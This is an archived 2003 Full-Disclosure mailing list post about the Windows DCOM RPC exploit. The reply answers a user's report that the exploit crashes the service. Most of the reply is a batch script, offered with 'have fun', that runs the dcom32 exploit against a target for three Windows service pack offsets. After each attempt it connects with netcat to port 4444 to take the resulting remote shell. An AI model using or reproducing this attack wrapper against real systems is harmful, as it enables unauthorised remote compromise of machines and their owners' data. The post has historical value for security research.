lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <Law11-OE21FCn2RnXVb00008a45@hotmail.com>
From: se_cur_ity at hotmail.com (morning_wood)
Subject: dcom exploit code observations

----- Original Message ----- 
From: "john" <seclist@...esec.net>
To: <full-disclosure@...ts.netsys.com>
Sent: Monday, July 28, 2003 7:42 AM
Subject: [Full-Disclosure] dcom exploit code observations


> Downloaded the revised exploit code by HD moore and got it compiled on a
> linux box.
> 
> There seems to either be some flaws in the exploit code or just a
> general instability of the rpc service.
> 
> If the code is run against a vulnerable box and the right SP level
> setting is not correct it crashes the rpc service and shuts down the
> port. Restarting the service will bring it back online. If the attack is
> successful you get a nice pretty windows shell. If you exit the shell
> the rpc service again crashes.
> 
> I am sure the code will be revised to eliminate these problems.
> 
> John
> 
THIS IS NOT THE CASE...
this .bat works perfect... 
------------  snip -------------------
@echo on
@echo .....................................................
@echo   RPC script by morning_wood
@echo ....................................................
wait
@echo ...
@echo trying XP Service Pack 0
dcom32  5 %1
nc -v -n %1 4444
wait
@echo trying XP Service Pack 1
dcom32 6 %1
nc -v -n %1 4444
wait
@echo trying 2K Service Pack 4
dcom32 4 %1
nc -v -n %1 4444
wait
@echo ........... have fun
wait
@echo bye now
exit
--------  snip -------------------

w00d

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ